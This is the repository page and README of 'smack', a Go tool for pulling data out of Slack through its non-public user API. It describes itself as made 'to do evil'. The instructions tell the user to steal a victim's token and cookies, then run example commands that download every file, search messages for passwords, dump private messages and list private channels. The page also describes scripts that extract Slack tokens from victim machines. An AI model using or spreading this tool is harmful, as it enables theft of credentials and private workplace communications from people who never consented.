Slack web UI exfiltration and persistence project
4bf194d3 — poptart 5 months ago
Fixed some user docs and moved the cmd to build into a directory called smack so it inherits its name
8be0213d — poptart 5 months ago
Forgot to add an example config and fixed the go import
1a823997 — poptart 7 months ago
Fixed stricter markdown rendering


browse  log 



You can also use your local clone with git send-email.


WARNING: Experimental

A tool to use the non-public Slack user interaction API to do evil. Current / planned capabilities are as follows:

  • Download all files accessible by the user using built-in search filters or mime-type extraction
  • Search for messages using search queries and download them all
  • Get a list of channels on a server
  • Retrieve user information and rights information
  • Download all history from a channel (PARTIAL)
  • Extract a users private messages

Some important sub-features planned:

  • No external modules, stdlib the whole way
  • Portable for use on windows
  • UNIX socket API for automation


git clone git.sr.ht/~poptart/smack 
cd "${GOPATH}/src/git.sr.ht/~poptart/smack/cmd/smack"
go build smack.go


go get git.sr.ht/~poptart/smack


usage: ./smack command [-vh] [-a user_agent] [-t token]
[-x x_cookie] [-u subdomain] [-c json_config] [command specific flags]
Globally used flags:
   -h: Print help and exit
   -v: Verbose
   -a user_agent: User-Agent string defaults to
                 ("Mozilla/5.0 (Windows NT 10.0; Win64; x64)
                 AppleWebKit/537.36 (KHTML, like Gecko)
                 Chrome/73.0.3683.103 Safari/537.36")
   -t token: Slack token to use for interactions, this is from
             localStorage. Often in the format of "xoxp-*"
   -x x_cookie: User authentication cookie from cookie storage
   -u subdomain: The subdomain for authentication i.e.: "metasploit"
                 will refer to"metasploit.slack.com"
   -c json_config: Read configuration from json, an example can be seen
                   in the source "examples/config.json". Flags should
                   override settings in configuation.
Command specific flags:
   files: Retrieves all files on a Slack server
      -n: Do not download the documents only retrieve their information
      -q query: query is used for Slack search. Currently all built in
                Slack filters for text are supported, and common
                type:filters are updated in the api.go file. Useful
                ones are 'type:all', 'type:zip', 'type:pdf'.
      -f filter: Files that content-type match filter will be selected.
                 This is most useful with '-q type:all' to filter for
                 files that Slack does not directly support for
                 filtering. Example: -f "application/pdf"
      -o output: Where to output downloaded files too, this is expected
                 to be a directory
   messages: Retrieves messages from a Slack server
      -q query: query is used for Slack search. Currently all built in
                Slack filters for text are supported
      -p: retrieve messages "to" and "from" the user, aka private
      -o outfile: write the messages to 'outfile'
      -i convid: retrieve messages from a conversation id (from channel
                 or conversation). Add -l option to limit the returned
      -l limit: only return "limit" number of responses. Must be a
   channels: List all channels or channel information
      -q query: query for a list of channels matching this string
      -o outfile: write channels to file
      -p: search for only private channels
      -i convid: retrive information about a specific channel by id
   check: List information and check configuration
      -o outfile: write channels to file
      -q: do not output anything except errors, useful for quick checks


  • files - Download all matching files on a query and filter string
  • messages - Download all the messages matching a query
  • channels - List all channels on a server
  • check - Test a configuration and get client information
  1. Steal a users token and cookies
  2. Generate a configuration file using examples/config.json as a template (NOTE: some API's might need different arguments. Generally URL, Token, and B cookie are needed)
  3. Run the check command
  4. Steal things:
./smack check -c examples/fakeserver.json
./smack files -c examples/fakeserver.json -q "type:zip" -o /tmp/
./smack files -c examples/fakeserver.json -q "type:zip password" -o /tmp/
./smack files -c examples/fakeserver.json -q "type:all" -f "text/plain" -o /tmp/
./smack messages -c examples/fakeserver.json -q "wifi password"
./smack messages -c examples/fakeserver.json -p
./smack channels -c examples/fakeserver.json
./smack channels -c examples/fakeserver.json -p -q "devops"


The smack project also attempts to maintain a way to extract the Slack tokens from victim systems. It additionally attempts to have functionality for many types of systems and many different methods for extractions. The following list of extractors is either in the works or exists:

  • Shell script - cmd/extractors/linux/extract.sh - Runs a bunch of strings on leveldb to extract tokens
  • C# executable and dll - cmd/extractors/win/cs/ - (PLANNED)
  • Go - cmd/extractors/win/go/ - (PLANNED)